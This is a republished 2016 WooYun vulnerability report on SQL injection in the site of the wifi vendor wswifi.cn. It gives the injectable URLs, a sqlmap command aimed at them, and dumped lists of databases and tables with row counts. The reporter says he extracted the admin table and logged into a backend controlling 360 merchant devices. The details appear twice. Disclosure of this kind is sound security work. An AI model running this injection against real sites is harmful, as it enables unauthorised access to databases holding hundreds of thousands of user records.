wifi安全之微商无线SQL注入涉及56w用户信息(可控制360台商家设备/包括网咖等)

admin
admin
admin
105013
文章
87
评论
2017年4月24日15:38:49评论240 views字数 236阅读0分47秒阅读模式
摘要

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2016-196946

漏洞标题: wifi安全之微商无线SQL注入涉及56w用户信息(可控制360台商家设备/包括网咖等)

相关厂商: wswifi.cn

漏洞作者: 黑色键盘丶

提交时间: 2016-04-22 14:05

公开时间: 2016-06-06 14:10

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

0人收藏

漏洞详情

披露状态:

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

RT 可垮裤查询

详细说明:

code 区域 
注入点;sqlmap.py -u "http://www.wswifi.cn/news_text.asp?newsid=3"
 http://ws.wswifi.cn/news_text.asp?newsid=25

数据库信息

code 区域 
back-end DBMS: Microsoft SQL Server 2008
 available databases [8]:
 [*] Engineering_database
 [*] master
 [*] model
 [*] msdb
 [*] tempdb
 [*] ws_weigou
 [*] wswifi
 [*] xhzA8_V10_2013

表信息

code 区域 
Database: wswifi
 +------------------------------+---------+
 | Table                        | Entries |
 +------------------------------+---------+
 | dbo.user_Browse_record       | 261096  |
 | dbo.free_renzheng            | 211319  |
 | dbo.setggao_Browse_record    | 43750   |
 | dbo.user_Browse_allcount     | 28472   |
 | dbo.china                    | 3295    |
 | dbo.user_login               | 2640    |
 | dbo.Businesses_data          | 1451    |
 | dbo.column_type              | 1416    |
 | dbo.user_prozan              | 1345    |
 | dbo.user_singin              | 1208    |
 | dbo.Businesses_user          | 1180    |
 | dbo.product                  | 849     |
 | dbo.[user_renzheng_count---] | 450     |
 | dbo.setggao_allcount         | 373     |
 | dbo.businesses               | 360     |
 | dbo.product_query            | 327     |
 | dbo.propinglun               | 299     |
 | dbo.Merchants                | 273     |
 | dbo.Businessesuser_roll      | 260     |
 | dbo.setggao_click_record     | 230     |
 | dbo.pangolin_test_table      | 192     |
 | dbo.job_Browse_record        | 190     |
 | dbo.user_renzheng            | 96      |
 | dbo.kehu_fahuo               | 87      |
 | dbo.Businessesuser_active    | 83      |
 | dbo.kehu_info                | 73      |
 | dbo.user_renzheng_weixin     | 47      |
 | dbo.rizhi_info               | 46      |
 | dbo.agent_apply              | 33      |
 | dbo.index_news               | 29      |
 | dbo.Businesses_Transfer      | 28      |
 | dbo.agent                    | 27      |
 | dbo.setggao_fabu             | 20      |
 | dbo.agent_salesman           | 18      |
 | dbo.industry                 | 11      |
 | dbo.Identification_type      | 10      |
 | dbo.[setggao_order---]       | 9       |
 | dbo.setggao                  | 7       |
 | dbo.index_help               | 5       |
 | dbo.column_display_mode      | 4       |
 | dbo.agent_jibie              | 3       |
 | dbo.agent_job                | 3       |
 | dbo.wswifiadmin              | 3       |
 | dbo.column_leixing           | 2       |
 | dbo.job_Apply                | 2       |
 | dbo.[ggao_send----]          | 1       |
 | dbo.[ggao_type--]            | 1       |
 | dbo.setggao_send             | 1       |
 +------------------------------+---------+

跑出了wswifiadmin 表后登陆后台 360个商家

wifi安全之微商无线SQL注入涉及56w用户信息(可控制360台商家设备/包括网咖等)

都是网咖 ktv等

垮裤查询 这里包括订单等信息

code 区域 
Database: ws_weigou
 +-------------------------------+---------+
 | Table                         | Entries |
 +-------------------------------+---------+
 | dbo.user_order_awardnum       | 407332  |
 | dbo.user_browsepro_record     | 269214  |
 | dbo.user_liulan_record        | 111459  |
 | dbo.user_Integral_detailed    | 4424    |
 | dbo.user_login                | 3807    |
 | dbo.china                     | 3295    |
 | dbo.user_order                | 3074    |
 | dbo.wg_user                   | 2421    |
 | dbo.user_consumption_record   | 542     |
 | dbo.[user_browsepro_record--] | 523     |
 | dbo.user_recharge_record      | 507     |
 | dbo.Product_shopping_trolley  | 429     |
 | dbo.user_red_envelopes        | 357     |
 | dbo.Product_award             | 59      |
 | dbo.category                  | 30      |
 | dbo.product                   | 25      |
 | dbo.uploadapp_pro             | 24      |
 | dbo.user_delivery_address     | 18      |
 | dbo.user_award_public         | 15      |
 | dbo.crowdfunding_pro          | 14      |
 | dbo.crowdfunding_order_record | 10      |
 | dbo.crowdfunding_order        | 8       |
 | dbo.friend_pro                | 7       |
 | dbo.user_grade                | 2       |
 | dbo.crowdfunding_order_temp   | 1       |
 | dbo.uploadadd                 | 1       |
 | dbo.user_order_temp           | 1       |
 | dbo.wsweigou_admin            | 1       |
 +-------------------------------+---------+
code 区域 
Database: Engineering_database
 +----------------------------------+---------+
 | Table                            | Entries |
 +----------------------------------+---------+
 | dbo.ggao_showcount_beifen        | 25196092 |
 | dbo.ggao_showcount               | 3060837 |
 | dbo.[ad_zhuomian_showcount--]    | 1648957 |
 | dbo.netbar_user_count            | 561529  |
 | dbo.ggao_clickcount              | 486537  |
 | dbo.ggao_allcount                | 408032  |
 | dbo.[ad_renzheng_lunbo_count--]  | 328725  |
 | dbo.rand_six_password            | 200000  |
 | dbo.netbar_user_allcount         | 67232   |
 | dbo.[netbar_zhuomian_allcount--] | 63633   |
 | dbo.netbar_user_login            | 47431   |
 | dbo.netbar_user                  | 41135   |
 | dbo.[ad_zhuomian_clickcount--]   | 33934   |
 | dbo.user_recharge                | 8927    |
 | dbo.netbar_login                 | 7432    |
 | dbo.china                        | 3295    |
 | dbo.ggao_fabu                    | 3008    |
 | dbo.[netbar_lunbo_allcount--]    | 1539    |
 | dbo.product                      | 396     |
 | dbo.Product_query                | 312     |
 | dbo.netbar                       | 281     |
 | dbo.Package                      | 176     |
 | dbo.ggao_send                    | 38      |
 | dbo.netbar_admin                 | 29      |
 | dbo.salesman                     | 21      |
 | dbo.[ad_zhuomian--]              | 17      |
 | dbo.[Engineering_user--]         | 9       |
 | dbo.ggao_zizhu_allcount          | 9       |
 | dbo.netbar_user_renzheng         | 8       |
 | dbo.[ad_renzheng_lunbo--]        | 3       |
 | dbo.Engineering_admin            | 3       |
 | dbo.ggao_type                    | 3       |
 | dbo.[ad_shezhi--]                | 1       |
 +----------------------------------+---------+

dbo.netbar_user_count | 561529

56w用户信息

wifi安全之微商无线SQL注入涉及56w用户信息(可控制360台商家设备/包括网咖等)

漏洞证明:

code 区域 
注入点;sqlmap.py -u "http://www.wswifi.cn/news_text.asp?newsid=3"
 http://ws.wswifi.cn/news_text.asp?newsid=25

数据库信息

code 区域 
back-end DBMS: Microsoft SQL Server 2008
 available databases [8]:
 [*] Engineering_database
 [*] master
 [*] model
 [*] msdb
 [*] tempdb
 [*] ws_weigou
 [*] wswifi
 [*] xhzA8_V10_2013

表信息

code 区域 
Database: wswifi
 +------------------------------+---------+
 | Table                        | Entries |
 +------------------------------+---------+
 | dbo.user_Browse_record       | 261096  |
 | dbo.free_renzheng            | 211319  |
 | dbo.setggao_Browse_record    | 43750   |
 | dbo.user_Browse_allcount     | 28472   |
 | dbo.china                    | 3295    |
 | dbo.user_login               | 2640    |
 | dbo.Businesses_data          | 1451    |
 | dbo.column_type              | 1416    |
 | dbo.user_prozan              | 1345    |
 | dbo.user_singin              | 1208    |
 | dbo.Businesses_user          | 1180    |
 | dbo.product                  | 849     |
 | dbo.[user_renzheng_count---] | 450     |
 | dbo.setggao_allcount         | 373     |
 | dbo.businesses               | 360     |
 | dbo.product_query            | 327     |
 | dbo.propinglun               | 299     |
 | dbo.Merchants                | 273     |
 | dbo.Businessesuser_roll      | 260     |
 | dbo.setggao_click_record     | 230     |
 | dbo.pangolin_test_table      | 192     |
 | dbo.job_Browse_record        | 190     |
 | dbo.user_renzheng            | 96      |
 | dbo.kehu_fahuo               | 87      |
 | dbo.Businessesuser_active    | 83      |
 | dbo.kehu_info                | 73      |
 | dbo.user_renzheng_weixin     | 47      |
 | dbo.rizhi_info               | 46      |
 | dbo.agent_apply              | 33      |
 | dbo.index_news               | 29      |
 | dbo.Businesses_Transfer      | 28      |
 | dbo.agent                    | 27      |
 | dbo.setggao_fabu             | 20      |
 | dbo.agent_salesman           | 18      |
 | dbo.industry                 | 11      |
 | dbo.Identification_type      | 10      |
 | dbo.[setggao_order---]       | 9       |
 | dbo.setggao                  | 7       |
 | dbo.index_help               | 5       |
 | dbo.column_display_mode      | 4       |
 | dbo.agent_jibie              | 3       |
 | dbo.agent_job                | 3       |
 | dbo.wswifiadmin              | 3       |
 | dbo.column_leixing           | 2       |
 | dbo.job_Apply                | 2       |
 | dbo.[ggao_send----]          | 1       |
 | dbo.[ggao_type--]            | 1       |
 | dbo.setggao_send             | 1       |
 +------------------------------+---------+

跑出了wswifiadmin 表后登陆后台 360个商家

wifi安全之微商无线SQL注入涉及56w用户信息(可控制360台商家设备/包括网咖等)

都是网咖 ktv等

垮裤查询 这里包括订单等信息

code 区域 
Database: ws_weigou
 +-------------------------------+---------+
 | Table                         | Entries |
 +-------------------------------+---------+
 | dbo.user_order_awardnum       | 407332  |
 | dbo.user_browsepro_record     | 269214  |
 | dbo.user_liulan_record        | 111459  |
 | dbo.user_Integral_detailed    | 4424    |
 | dbo.user_login                | 3807    |
 | dbo.china                     | 3295    |
 | dbo.user_order                | 3074    |
 | dbo.wg_user                   | 2421    |
 | dbo.user_consumption_record   | 542     |
 | dbo.[user_browsepro_record--] | 523     |
 | dbo.user_recharge_record      | 507     |
 | dbo.Product_shopping_trolley  | 429     |
 | dbo.user_red_envelopes        | 357     |
 | dbo.Product_award             | 59      |
 | dbo.category                  | 30      |
 | dbo.product                   | 25      |
 | dbo.uploadapp_pro             | 24      |
 | dbo.user_delivery_address     | 18      |
 | dbo.user_award_public         | 15      |
 | dbo.crowdfunding_pro          | 14      |
 | dbo.crowdfunding_order_record | 10      |
 | dbo.crowdfunding_order        | 8       |
 | dbo.friend_pro                | 7       |
 | dbo.user_grade                | 2       |
 | dbo.crowdfunding_order_temp   | 1       |
 | dbo.uploadadd                 | 1       |
 | dbo.user_order_temp           | 1       |
 | dbo.wsweigou_admin            | 1       |
 +-------------------------------+---------+
code 区域 
Database: Engineering_database
 +----------------------------------+---------+
 | Table                            | Entries |
 +----------------------------------+---------+
 | dbo.ggao_showcount_beifen        | 25196092 |
 | dbo.ggao_showcount               | 3060837 |
 | dbo.[ad_zhuomian_showcount--]    | 1648957 |
 | dbo.netbar_user_count            | 561529  |
 | dbo.ggao_clickcount              | 486537  |
 | dbo.ggao_allcount                | 408032  |
 | dbo.[ad_renzheng_lunbo_count--]  | 328725  |
 | dbo.rand_six_password            | 200000  |
 | dbo.netbar_user_allcount         | 67232   |
 | dbo.[netbar_zhuomian_allcount--] | 63633   |
 | dbo.netbar_user_login            | 47431   |
 | dbo.netbar_user                  | 41135   |
 | dbo.[ad_zhuomian_clickcount--]   | 33934   |
 | dbo.user_recharge                | 8927    |
 | dbo.netbar_login                 | 7432    |
 | dbo.china                        | 3295    |
 | dbo.ggao_fabu                    | 3008    |
 | dbo.[netbar_lunbo_allcount--]    | 1539    |
 | dbo.product                      | 396     |
 | dbo.Product_query                | 312     |
 | dbo.netbar                       | 281     |
 | dbo.Package                      | 176     |
 | dbo.ggao_send                    | 38      |
 | dbo.netbar_admin                 | 29      |
 | dbo.salesman                     | 21      |
 | dbo.[ad_zhuomian--]              | 17      |
 | dbo.[Engineering_user--]         | 9       |
 | dbo.ggao_zizhu_allcount          | 9       |
 | dbo.netbar_user_renzheng         | 8       |
 | dbo.[ad_renzheng_lunbo--]        | 3       |
 | dbo.Engineering_admin            | 3       |
 | dbo.ggao_type                    | 3       |
 | dbo.[ad_shezhi--]                | 1       |
 +----------------------------------+---------+

dbo.netbar_user_count | 561529

56w用户信息

wifi安全之微商无线SQL注入涉及56w用户信息(可控制360台商家设备/包括网咖等)

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-04-22 14:08

厂商回复:

高危漏洞

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin